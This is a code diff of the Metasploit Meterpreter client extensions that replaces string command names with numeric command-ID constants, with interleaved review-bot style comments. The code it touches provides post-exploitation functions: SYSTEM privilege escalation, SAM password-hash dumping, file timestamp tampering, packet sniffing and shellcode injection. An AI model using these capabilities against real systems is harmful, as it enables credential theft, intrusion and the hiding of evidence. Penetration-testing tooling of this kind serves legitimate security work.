-TLV_TYPE_PEINJECTOR_SHELLCODE_SIZE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 2)
-TLV_TYPE_PEINJECTOR_SHELLCODE_ISX64 = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 3)
-TLV_TYPE_PEINJECTOR_TARGET_EXECUTABLE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4)
-TLV_TYPE_PEINJECTOR_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 5)
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_PEINJECTOR = 16000
+# Associated command ids
+COMMAND_ID_PEINJECTOR_INJECT_SHELLCODE = EXTENSION_ID_PEINJECTOR + 1
+
+TLV_TYPE_PEINJECTOR_SHELLCODE = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 1)
+TLV_TYPE_PEINJECTOR_SHELLCODE_SIZE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 2)
+TLV_TYPE_PEINJECTOR_SHELLCODE_ISX64 = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 3)
+TLV_TYPE_PEINJECTOR_TARGET_EXECUTABLE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4)
+TLV_TYPE_PEINJECTOR_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 5)
 end
 end
diff --git a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb
index 08afb46b7f98d..adeb44f09184a 100644
--- a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb
+++ b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb
@@ -17,6 +17,9 @@ module Powershell
 ###
 class Powershell < Extension
+ def self.extension_id
+ EXTENSION_ID_POWERSHELL
+ end
 def initialize(client)
 super(client, 'powershell')
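Review bot: The new constant block in this tlv.rb drops the blank line between `EXTENSION_ID_PEINJECTOR = 16000` and `# Associated command ids` that the lanattacks, mimikatz, networkpug and powershell tlv.rb hunks in this commit all have, so the five files no longer share one layout. Inserting the blank line keeps the headers identical in shape, which is worth having if these blocks are ever read by the source generators the description mentions. The five `TLV_TYPE_PEINJECTOR_*` lines are removed and re-added with no visible difference, which suggests a whitespace-only edit; a `git diff -w` pass would confirm nothing else changed.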
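Review bot: `def self.extension_id` in powershell.rb is added without a blank line before the following `def initialize(client)`, unlike the mimikatz, networkpug and priv hunks in this commit, which all separate the new method from the next one. Adding the blank line after the new `end` keeps the file consistent with the other extensions and with the one-empty-line-between-methods convention. The enclosing class continues outside the hunk.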
@@ -45,7 +48,7 @@ def import_file(opts={})
 # TODO: perhaps do some kind of check to see if the DLL is a .NET assembly?
 binary = ::File.read(opts[:file])
- request = Packet.create_request('powershell_assembly_load')
+ request = Packet.create_request(COMMAND_ID_POWERSHELL_ASSEMBLY_LOAD)
 request.add_tlv(TLV_TYPE_POWERSHELL_ASSEMBLY_SIZE, binary.length)
 request.add_tlv(TLV_TYPE_POWERSHELL_ASSEMBLY, binary)
 client.send_request(request)
@@ -57,7 +60,7 @@ def import_file(opts={})
 def session_remove(opts={})
 return false unless opts[:session_id]
- request = Packet.create_request('powershell_session_remove')
+ request = Packet.create_request(COMMAND_ID_POWERSHELL_SESSION_REMOVE)
 request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id]
 client.send_request(request)
 return true
@@ -66,7 +69,7 @@ def session_remove(opts={})
 def execute_string(opts={})
 return nil unless opts[:code]
- request = Packet.create_request('powershell_execute')
+ request = Packet.create_request(COMMAND_ID_POWERSHELL_EXECUTE)
 request.add_tlv(TLV_TYPE_POWERSHELL_CODE, opts[:code])
 request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id]
@@ -75,7 +78,7 @@ def execute_string(opts={})
 end
 def shell(opts={})
- request = Packet.create_request('powershell_shell')
+ request = Packet.create_request(COMMAND_ID_POWERSHELL_SHELL)
 request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id]
 response = client.send_request(request)
diff --git a/lib/rex/post/meterpreter/extensions/powershell/tlv.rb b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb
index edb69d3c68ac6..eb6e670351f67 100644
--- a/lib/rex/post/meterpreter/extensions/powershell/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb
@@ -5,6 +5,15 @@ module Meterpreter
 module Extensions
 module Powershell
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_POWERSHELL = 14000
+
+# Associated command ids
+COMMAND_ID_POWERSHELL_ASSEMBLY_LOAD = EXTENSION_ID_POWERSHELL + 1
+COMMAND_ID_POWERSHELL_EXECUTE = EXTENSION_ID_POWERSHELL + 2
+COMMAND_ID_POWERSHELL_SESSION_REMOVE = EXTENSION_ID_POWERSHELL + 3
+COMMAND_ID_POWERSHELL_SHELL = EXTENSION_ID_POWERSHELL + 4
+
 TLV_TYPE_POWERSHELL_SESSIONID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1)
 TLV_TYPE_POWERSHELL_CODE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2)
 TLV_TYPE_POWERSHELL_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3)
diff --git a/lib/rex/post/meterpreter/extensions/priv/fs.rb b/lib/rex/post/meterpreter/extensions/priv/fs.rb
index 2cae2972b5ecf..deb899c2838e7 100644
--- a/lib/rex/post/meterpreter/extensions/priv/fs.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/fs.rb
@@ -27,7 +27,7 @@ def initialize(client)
 # values for the specified file path.
 #
 def get_file_mace(file_path)
- request = Packet.create_request('priv_fs_get_file_mace')
+ request = Packet.create_request(COMMAND_ID_PRIV_FS_GET_FILE_MACE)
 request.add_tlv(TLV_TYPE_FS_FILE_PATH, file_path)
@@ -42,7 +42,7 @@ def get_file_mace(file_path)
 'Entry Modified' => Time.at(response.get_tlv_value(TLV_TYPE_FS_FILE_EMODIFIED))
 }
 rescue RangeError
- raise RangeError, "Invalid MACE values"
+ raise RangeError, 'Invalid MACE values'
 end
 end
@@ -53,7 +53,7 @@ def get_file_mace(file_path)
 #
 def set_file_mace(file_path, modified = nil, accessed = nil, created = nil,
 entry_modified = nil)
- request = Packet.create_request('priv_fs_set_file_mace')
+ request = Packet.create_request(COMMAND_ID_PRIV_FS_SET_FILE_MACE)
 request.add_tlv(TLV_TYPE_FS_FILE_PATH, file_path)
 request.add_tlv(TLV_TYPE_FS_FILE_MODIFIED, modified.to_i) if (modified)
@@ -71,7 +71,7 @@ def set_file_mace(file_path, modified = nil, accessed = nil, created = nil, # attributes of the source_file_path. # def set_file_mace_from_file(target_file_path, source_file_path) - request = Packet.create_request('priv_fs_set_file_mace_from_file') + request = Packet.create_request(COMMAND_ID_PRIV_FS_SET_FILE_MACE_FROM_FILE) request.add_tlv(TLV_TYPE_FS_FILE_PATH, target_file_path) request.add_tlv(TLV_TYPE_FS_SRC_FILE_PATH, source_file_path) @@ -86,7 +86,7 @@ def set_file_mace_from_file(target_file_path, source_file_path) # be displayed by most all products for a file. # def blank_file_mace(file_path) - request = Packet.create_request('priv_fs_blank_file_mace') + request = Packet.create_request(COMMAND_ID_PRIV_FS_BLANK_FILE_MACE) request.add_tlv(TLV_TYPE_FS_FILE_PATH, file_path) @@ -100,7 +100,7 @@ def blank_file_mace(file_path) # directory. # def blank_directory_mace(dir_path) - request = Packet.create_request('priv_fs_blank_directory_mace') + request = Packet.create_request(COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE) request.add_tlv(TLV_TYPE_FS_FILE_PATH, dir_path) diff --git a/lib/rex/post/meterpreter/extensions/priv/priv.rb b/lib/rex/post/meterpreter/extensions/priv/priv.rb index ffadc6630e714..78e07f0923d7d 100644 --- a/lib/rex/post/meterpreter/extensions/priv/priv.rb +++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb @@ -19,6 +19,10 @@ module Priv ### class Priv < Extension + def self.extension_id + EXTENSION_ID_PRIV + end + # # Initializes the privilege escalationextension. # 
@@ -40,14 +44,14 @@ def initialize(client) # # Attempt to elevate the meterpreter to Local SYSTEM # - def getsystem( technique=0 ) - request = Packet.create_request( 'priv_elevate_getsystem' ) + def getsystem(technique=0) + request = Packet.create_request(COMMAND_ID_PRIV_ELEVATE_GETSYSTEM) # We only need the elevate DLL for when we're invoking the tokendup # method, which we'll only use if required (ie. trying all or when # that metdho is asked for explicitly) if [0, 3].include?(technique) - elevator_name = Rex::Text.rand_text_alpha_lower( 6 ) + elevator_name = Rex::Text.rand_text_alpha_lower(6) elevator_path = nil client.binary_suffix.each { |s| 
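Review bot: The rewritten signature `def getsystem(technique=0)` removes the old padding but not in the direction the rest of the commit moves; the style-guide spacing is `def getsystem(technique = 0)`. While this region is being touched, the context comment `that metdho is asked for explicitly` carries a typo and would read `that method is asked for explicitly`. `getsystem` continues past the end of this hunk.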
@@ -57,40 +61,40 @@ def getsystem( technique=0 ) end } if elevator_path.nil? - elevators = "" + elevators = '' client.binary_suffix.each { |s| elevators << "elevator.#{s}, " } raise RuntimeError, "#{elevators.chomp(', ')} not found", caller end - elevator_data = "" + elevator_data = '' - ::File.open( elevator_path, "rb" ) { |f| - elevator_data += f.read( f.stat.size ) + ::File.open(elevator_path, 'rb') { |f| + elevator_data += f.read(f.stat.size) } - request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name ) - request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data ) - request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length ) + request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name) + request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data) + request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length) end - request.add_tlv( TLV_TYPE_ELEVATE_TECHNIQUE, technique ) + request.add_tlv(TLV_TYPE_ELEVATE_TECHNIQUE, technique) # as some service routines can be slow we bump up the timeout to 90 seconds - response = client.send_request( request, 90 ) + response = client.send_request(request, 90) - technique = response.get_tlv_value( TLV_TYPE_ELEVATE_TECHNIQUE ) + technique = response.get_tlv_value(TLV_TYPE_ELEVATE_TECHNIQUE) - if( response.result == 0 and technique != nil ) - client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" ) + if(response.result == 0 and technique != nil) + client.core.use('stdapi') if not client.ext.aliases.include?('stdapi') client.update_session_info client.sys.config.getprivs if client.framework.db and client.framework.db.active client.framework.db.report_note( :host => client.sock.peerhost, :workspace => client.framework.db.workspace, - :type => "meterpreter.getsystem", + :type => 'meterpreter.getsystem', :data => {:technique => technique} ) rescue nil end 
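Review bot: `if(response.result == 0 and technique != nil)` and `if not client.ext.aliases.include?('stdapi')` were rewritten for quoting but keep `and`/`not` and the explicit nil comparison; since the lines are being touched anyway, `if response.result == 0 && technique` and `client.core.use('stdapi') unless client.ext.aliases.include?('stdapi')` match the style the rest of the commit adopts. The `elevator_data = ''` line plus the three-line `::File.open(elevator_path, 'rb') { |f| elevator_data += f.read(f.stat.size) }` block reduce to `elevator_data = ::File.binread(elevator_path)`. The `rescue nil` modifier on the `report_note` call still hides every error from the DB write; if it is meant to be best-effort, rescuing a named error class and logging it keeps that intent without masking mistakes. `getsystem` starts before and ends after this hunk.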
@@ -105,7 +109,7 @@ def getsystem( technique=0 ) # def sam_hashes # This can take a long long time for large domain controls, bump the timeout to one hour - response = client.send_request(Packet.create_request('priv_passwd_get_sam_hashes'), 3600) + response = client.send_request(Packet.create_request(COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES), 3600) response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash| SamUser.new(hash) diff --git a/lib/rex/post/meterpreter/extensions/priv/tlv.rb b/lib/rex/post/meterpreter/extensions/priv/tlv.rb index 92cf1b7f4ad43..a19ffdef3c978 100644 --- a/lib/rex/post/meterpreter/extensions/priv/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/priv/tlv.rb @@ -5,6 +5,18 @@ module Meterpreter module Extensions module Priv +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_PRIV = 2000 + +# Associated command ids +COMMAND_ID_PRIV_ELEVATE_GETSYSTEM = EXTENSION_ID_PRIV + 1 +COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE = EXTENSION_ID_PRIV + 2 +COMMAND_ID_PRIV_FS_BLANK_FILE_MACE = EXTENSION_ID_PRIV + 3 +COMMAND_ID_PRIV_FS_GET_FILE_MACE = EXTENSION_ID_PRIV + 4 +COMMAND_ID_PRIV_FS_SET_FILE_MACE = EXTENSION_ID_PRIV + 5 +COMMAND_ID_PRIV_FS_SET_FILE_MACE_FROM_FILE = EXTENSION_ID_PRIV + 6 +COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES = EXTENSION_ID_PRIV + 7 + # Passwd TLV_TYPE_SAM_HASHES = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1) diff --git a/lib/rex/post/meterpreter/extensions/python/python.rb b/lib/rex/post/meterpreter/extensions/python/python.rb index ee079a95b0b75..36cb69465635b 100644 --- a/lib/rex/post/meterpreter/extensions/python/python.rb +++ b/lib/rex/post/meterpreter/extensions/python/python.rb @@ -28,6 +28,10 @@ class Python < Extension '.pyc' => PY_CODE_TYPE_PYC } + def self.extension_id + EXTENSION_ID_PYTHON + end + # # Typical extension initialization routine. # 
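Review bot: `response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/)` on the line after the rewritten request raises `NoMethodError` on nil if the reply carries no hash TLV, which is a less useful failure than an empty list; `(response.get_tlv_value(TLV_TYPE_SAM_HASHES) || '').split(/\n/)` returns `[]` in that case, assuming `get_tlv_value` returns nil for a missing TLV. The `map { |hash| SamUser.new(hash) }` block continues past the end of the hunk.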
@@ -45,7 +49,7 @@ def initialize(client) end def reset - request = Packet.create_request('python_reset') + request = Packet.create_request(COMMAND_ID_PYTHON_RESET) client.send_request(request) return true @@ -63,7 +67,7 @@ def import(file, mod_name, result_var) code = ::File.read(file) - request = Packet.create_request('python_execute') + request = Packet.create_request(COMMAND_ID_PYTHON_EXECUTE) request.add_tlv(TLV_TYPE_PYTHON_CODE, code) request.add_tlv(TLV_TYPE_PYTHON_CODE_LEN, code.length) request.add_tlv(TLV_TYPE_PYTHON_CODE_TYPE, PY_CODE_FILE_TYPE_MAP[ext]) @@ -78,7 +82,7 @@ def import(file, mod_name, result_var) # # @return [Hash] def execute_string(code, result_var) - request = Packet.create_request('python_execute') + request = Packet.create_request(COMMAND_ID_PYTHON_EXECUTE) request.add_tlv(TLV_TYPE_PYTHON_CODE, code) request.add_tlv(TLV_TYPE_PYTHON_CODE_TYPE, PY_CODE_TYPE_STRING) request.add_tlv(TLV_TYPE_PYTHON_RESULT_VAR, result_var) if result_var diff --git a/lib/rex/post/meterpreter/extensions/python/tlv.rb b/lib/rex/post/meterpreter/extensions/python/tlv.rb index 318593a6b8cca..181dd9ebfaa8a 100644 --- a/lib/rex/post/meterpreter/extensions/python/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/python/tlv.rb @@ -5,6 +5,14 @@ module Meterpreter module Extensions module Python +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_PYTHON = 13000 + +# Associated command ids +COMMAND_ID_PYTHON_EXECUTE = EXTENSION_ID_PYTHON + 1 +COMMAND_ID_PYTHON_RESET = EXTENSION_ID_PYTHON + 2 + + TLV_TYPE_PYTHON_STDOUT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1) TLV_TYPE_PYTHON_STDERR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2) TLV_TYPE_PYTHON_CODE = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 3) diff --git a/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb b/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb index 02f5421d45cfd..3b7870d611105 100644 --- a/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb 
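Review bot: In `import`, the context line `code = ::File.read(file)` at the top of the second hunk feeds `request.add_tlv(TLV_TYPE_PYTHON_CODE_LEN, code.length)`, so a `.pyc` file — which `PY_CODE_FILE_TYPE_MAP` shows is an accepted input — is read in text mode and its length reported in characters, not bytes; `code = ::File.binread(file)` and `code.bytesize` keep the advertised length equal to the raw TLV payload. `import` begins before this hunk.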
+++ b/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb @@ -16,6 +16,9 @@ module Sniffer ### class Sniffer < Extension + def self.extension_id + EXTENSION_ID_SNIFFER + end def initialize(client) super(client, 'sniffer') @@ -33,8 +36,7 @@ def initialize(client) # Enumerate the remote sniffable interfaces def interfaces() ifaces = [] - ifacei = 0 - request = Packet.create_request('sniffer_interfaces') + request = Packet.create_request(COMMAND_ID_SNIFFER_INTERFACES) response = client.send_request(request) response.each(TLV_TYPE_SNIFFER_INTERFACES) { |p| vals = p.tlvs.map{|x| x.value } @@ -54,16 +56,16 @@ def interfaces() # Start a packet capture on an opened interface def capture_start(intf,maxp=200000,filter="") - request = Packet.create_request('sniffer_capture_start') + request = Packet.create_request(COMMAND_ID_SNIFFER_CAPTURE_START) request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i) request.add_tlv(TLV_TYPE_SNIFFER_PACKET_COUNT, maxp.to_i) request.add_tlv(TLV_TYPE_SNIFFER_ADDITIONAL_FILTER, filter) if filter.length > 0 - response = client.send_request(request) + client.send_request(request) end # Stop an active packet capture def capture_stop(intf) - request = Packet.create_request('sniffer_capture_stop') + request = Packet.create_request(COMMAND_ID_SNIFFER_CAPTURE_STOP) request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i) response = client.send_request(request) { @@ -74,7 +76,7 @@ def capture_stop(intf) # Retrieve stats about a current capture def capture_stats(intf) - request = Packet.create_request('sniffer_capture_stats') + request = Packet.create_request(COMMAND_ID_SNIFFER_CAPTURE_STATS) request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i) response = client.send_request(request) { 
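Review bot: The `def self.extension_id` added to `Sniffer` runs straight into `def initialize` with no blank line, unlike the same method added to Priv, Python and Stdapi elsewhere in this commit; add the blank line for consistency. In `capture_start`, the rewritten request is followed by `request.add_tlv(TLV_TYPE_SNIFFER_ADDITIONAL_FILTER, filter) if filter.length > 0`, which reads better as `unless filter.empty?`, and the signature `def capture_start(intf,maxp=200000,filter="")` would be `def capture_start(intf, maxp = 200000, filter = '')`. `capture_stop` and `capture_stats` continue past the end of their hunks.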
@@ -85,7 +87,7 @@ def capture_stats(intf) # Release packets from a current capture def capture_release(intf) - request = Packet.create_request('sniffer_capture_release') + request = Packet.create_request(COMMAND_ID_SNIFFER_CAPTURE_RELEASE) request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i) response = client.send_request(request) { @@ -96,7 +98,7 @@ def capture_release(intf) # Buffer the current capture to a readable buffer def capture_dump(intf) - request = Packet.create_request('sniffer_capture_dump') + request = Packet.create_request(COMMAND_ID_SNIFFER_CAPTURE_DUMP) request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i) response = client.send_request(request, 3600) { @@ -108,7 +110,7 @@ def capture_dump(intf) # Retrieve the packet data for the specified capture def capture_dump_read(intf, len=16384) - request = Packet.create_request('sniffer_capture_dump_read') + request = Packet.create_request(COMMAND_ID_SNIFFER_CAPTURE_DUMP_READ) request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i) request.add_tlv(TLV_TYPE_SNIFFER_BYTE_COUNT, len.to_i) response = client.send_request(request, 3600) diff --git a/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb b/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb index 67f076f443aff..fbb4af3c68c53 100644 --- a/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb 
@@ -5,7 +5,20 @@ module Meterpreter module Extensions module Sniffer +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_SNIFFER = 4000 + +# Associated command ids +COMMAND_ID_SNIFFER_CAPTURE_DUMP = EXTENSION_ID_SNIFFER + 1 +COMMAND_ID_SNIFFER_CAPTURE_DUMP_READ = EXTENSION_ID_SNIFFER + 2 +COMMAND_ID_SNIFFER_CAPTURE_RELEASE = EXTENSION_ID_SNIFFER + 3 +COMMAND_ID_SNIFFER_CAPTURE_START = EXTENSION_ID_SNIFFER + 4 +COMMAND_ID_SNIFFER_CAPTURE_STATS = EXTENSION_ID_SNIFFER + 5 +COMMAND_ID_SNIFFER_CAPTURE_STOP = EXTENSION_ID_SNIFFER + 6 +COMMAND_ID_SNIFFER_INTERFACES = EXTENSION_ID_SNIFFER + 7 + TLV_TYPE_EXTENSION_SNIFFER = 0 + TLV_TYPE_SNIFFER_INTERFACES = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 1) TLV_TYPE_SNIFFER_INTERFACE_ID = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 2) TLV_TYPE_SNIFFER_INTERFACE_HANDLE = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_SNIFFER + TLV_EXTENSIONS + 3) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/constants.rb b/lib/rex/post/meterpreter/extensions/stdapi/constants.rb index fe789b17525c8..4ea7af1237c9c 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/constants.rb @@ -1,4 +1,5 @@ # -*- coding: binary -*- +# ### # diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb index e36b33efb89cd..e880633933405 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb @@ -53,7 +53,7 @@ def each(&block) # Enumerates all of the files/folders in a given directory. # def Dir.entries(name = getwd, glob = nil) - request = Packet.create_request('stdapi_fs_ls') + request = Packet.create_request(COMMAND_ID_STDAPI_FS_LS) files = [] name = name + ::File::SEPARATOR + glob if glob 
@@ -72,7 +72,7 @@ def Dir.entries(name = getwd, glob = nil) # Enumerates files with a bit more information than the default entries. # def Dir.entries_with_info(name = getwd) - request = Packet.create_request('stdapi_fs_ls') + request = Packet.create_request(COMMAND_ID_STDAPI_FS_LS) files = [] sbuf = nil new_stat_buf = true @@ -130,7 +130,7 @@ def Dir.match(name, dir = false) sbuf = nil new_stat_buf = true - request = Packet.create_request('stdapi_fs_ls') + request = Packet.create_request(COMMAND_ID_STDAPI_FS_LS) request.add_tlv(TLV_TYPE_DIRECTORY_PATH, client.unicode_filter_decode(path)) response = client.send_request(request) @@ -176,11 +176,11 @@ def Dir.match(name, dir = false) # Changes the working directory of the remote process. # def Dir.chdir(path) - request = Packet.create_request('stdapi_fs_chdir') + request = Packet.create_request(COMMAND_ID_STDAPI_FS_CHDIR) request.add_tlv(TLV_TYPE_DIRECTORY_PATH, client.unicode_filter_decode( path )) - response = client.send_request(request) + client.send_request(request) getwd(refresh: true) return 0 @@ -190,11 +190,11 @@ def Dir.chdir(path) # Creates a directory. # def Dir.mkdir(path) - request = Packet.create_request('stdapi_fs_mkdir') + request = Packet.create_request(COMMAND_ID_STDAPI_FS_MKDIR) request.add_tlv(TLV_TYPE_DIRECTORY_PATH, client.unicode_filter_decode( path )) - response = client.send_request(request) + client.send_request(request) return 0 end @@ -204,7 +204,7 @@ def Dir.mkdir(path) # def Dir.pwd(refresh: true) if @working_directory.nil? || refresh - request = Packet.create_request('stdapi_fs_getwd') + request = Packet.create_request(COMMAND_ID_STDAPI_FS_GETWD) response = client.send_request(request) 
@@ -224,11 +224,11 @@ def Dir.getwd(refresh: true) # Removes the supplied directory if it's empty. # def Dir.delete(path) - request = Packet.create_request('stdapi_fs_delete_dir') + request = Packet.create_request(COMMAND_ID_STDAPI_FS_DELETE_DIR) request.add_tlv(TLV_TYPE_DIRECTORY_PATH, client.unicode_filter_decode( path )) - response = client.send_request(request) + client.send_request(request) return 0 end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb index 8fd356cc10f02..319609a2d6efa 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb @@ -40,7 +40,7 @@ def File.separator() # unnecessary requests. return @separator if @separator - request = Packet.create_request('stdapi_fs_separator') + request = Packet.create_request(COMMAND_ID_STDAPI_FS_SEPARATOR) # Fall back to the old behavior of always assuming windows. This # allows meterpreter executables built before the addition of this @@ -79,7 +79,7 @@ def File.search( root=nil, glob="*.*", recurse=true, timeout=-1 ) files = ::Array.new - request = Packet.create_request( 'stdapi_fs_search' ) + request = Packet.create_request( COMMAND_ID_STDAPI_FS_SEARCH ) root = client.unicode_filter_decode(root) if root root = root.chomp( self.separator ) if root @@ -135,7 +135,7 @@ def File.basename(*a) # caution. # def File.expand_path(path) - request = Packet.create_request('stdapi_fs_file_expand_path') + request = Packet.create_request(COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH) request.add_tlv(TLV_TYPE_FILE_PATH, client.unicode_filter_decode( path )) @@ -149,7 +149,7 @@ def File.expand_path(path) # Calculates the MD5 (16-bytes raw) of a remote file # def File.md5(path) - request = Packet.create_request('stdapi_fs_md5') + request = Packet.create_request(COMMAND_ID_STDAPI_FS_MD5) request.add_tlv(TLV_TYPE_FILE_PATH, client.unicode_filter_decode( path )) 
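Review bot: `request = Packet.create_request( COMMAND_ID_STDAPI_FS_SEARCH )` in `File.search` keeps the padded parentheses while every other `create_request` call rewritten by this commit drops them; use `request = Packet.create_request(COMMAND_ID_STDAPI_FS_SEARCH)`. The surrounding `files = ::Array.new` and `root.chomp( self.separator )` lines use the same older style but are unchanged context. `File.search` continues past the end of the hunk.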
@@ -165,7 +165,7 @@ def File.md5(path) # Calculates the SHA1 (20-bytes raw) of a remote file # def File.sha1(path) - request = Packet.create_request('stdapi_fs_sha1') + request = Packet.create_request(COMMAND_ID_STDAPI_FS_SHA1) request.add_tlv(TLV_TYPE_FILE_PATH, client.unicode_filter_decode( path )) @@ -196,7 +196,7 @@ def File.exist?(name) # Performs a delete on the remote file +name+ # def File.rm(name) - request = Packet.create_request('stdapi_fs_delete_file') + request = Packet.create_request(COMMAND_ID_STDAPI_FS_DELETE_FILE) request.add_tlv(TLV_TYPE_FILE_PATH, client.unicode_filter_decode( name )) @@ -214,7 +214,7 @@ class << self # Performs a rename from oldname to newname # def File.mv(oldname, newname) - request = Packet.create_request('stdapi_fs_file_move') + request = Packet.create_request(COMMAND_ID_STDAPI_FS_FILE_MOVE) request.add_tlv(TLV_TYPE_FILE_NAME, client.unicode_filter_decode( oldname )) request.add_tlv(TLV_TYPE_FILE_PATH, client.unicode_filter_decode( newname )) @@ -233,7 +233,7 @@ class << self # Performs a copy from oldname to newname # def File.cp(oldname, newname) - request = Packet.create_request('stdapi_fs_file_copy') + request = Packet.create_request(COMMAND_ID_STDAPI_FS_FILE_COPY) request.add_tlv(TLV_TYPE_FILE_NAME, client.unicode_filter_decode( oldname )) request.add_tlv(TLV_TYPE_FILE_PATH, client.unicode_filter_decode( newname )) @@ -251,7 +251,7 @@ class << self # Performs a chmod on the remote file # def File.chmod(name, mode) - request = Packet.create_request('stdapi_fs_chmod') + request = Packet.create_request(COMMAND_ID_STDAPI_FS_CHMOD) request.add_tlv(TLV_TYPE_FILE_PATH, client.unicode_filter_decode( name )) request.add_tlv(TLV_TYPE_FILE_MODE_T, mode) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb index 8d51644bbd36a..d6a5b9c9a045f 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb 
+++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb @@ -130,7 +130,7 @@ def update32(stat_buf) # hash to the requestor. # def stat(file) - request = Packet.create_request('stdapi_fs_stat') + request = Packet.create_request(COMMAND_ID_STDAPI_FS_STAT) request.add_tlv(TLV_TYPE_FILE_PATH, self.class.client.unicode_filter_decode( file )) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/mount.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/mount.rb index 0a57673f45266..a396e9aac3555 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/fs/mount.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/mount.rb @@ -27,7 +27,7 @@ def initialize(client) end def show_mount - request = Packet.create_request('stdapi_fs_mount_show') + request = Packet.create_request(COMMAND_ID_STDAPI_FS_MOUNT_SHOW) response = client.send_request(request) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/mic/mic.rb b/lib/rex/post/meterpreter/extensions/stdapi/mic/mic.rb index 08d61e42fce92..2d339ba86da36 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/mic/mic.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/mic/mic.rb 
